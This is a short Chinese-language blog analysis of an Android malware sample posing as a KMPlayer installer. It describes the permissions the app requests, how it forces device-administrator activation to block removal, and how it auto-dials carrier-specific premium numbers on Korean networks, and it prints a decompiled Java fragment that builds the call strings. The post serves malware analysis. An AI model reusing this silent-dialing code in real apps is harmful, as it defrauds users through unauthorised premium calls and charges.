一个android病毒分析com.example.com.android.message2

阅读更多

        工作之余，在等项目反馈，无聊之中去分析病毒代码，今天来给大家分析一款新型的手机病毒，发现腾讯和360都没有被查杀，可见这些杀毒软件只会跟在别人屁股后面。
       这款病毒伪装为KMPlayer的安装软件，如图，下载在电脑会是

    apk包名为:com.example.com.android.message2      

    apk的权限三个比较重要的

     //读取短信
     >//读取电话状态    
     //打电话

     apk会以短信域名的方式收到而点击下载自动安装

   

   点安装看下一步会发生什么情况

    安装完成会我打开发现软件直接跳进要激活设备管理器

 
 这个功能主机是把软件功能用户在软件管理变灰，不让用户删除

 

二秒钟后，这个病毒会打拨打电话给游戏冲值

 

代码如下

String str;
    if ("olleh".equals(HeartReceiver.a(this.a)))
      str = "*88" + this.b + "*";
    while (true)
    {
      Intent localIntent = new Intent("android.intent.action.CALL", Uri.fromParts("tel", str, null));
      localIntent.setFlags(268697600);
      this.c.startActivity(localIntent);
      return;
      if ("SKTelecom".equals(HeartReceiver.a(this.a)))
        str = "*88" + this.b + "*";
      else if ("LG U+".equals(HeartReceiver.a(this.a)))
        str = "*88#" + this.b;
      else
        str = "*88" + this.b + "*";

 

调用CALL来拔打电话，Sk，LG,OLL分别的韩国三大移动商。

同时还带有服务身指家号码群发短信。

 

 

 

 

• 
• 大小: 3 KB

• 
• 大小: 90.8 KB

• 
• 大小: 98.5 KB

• 查看图片附件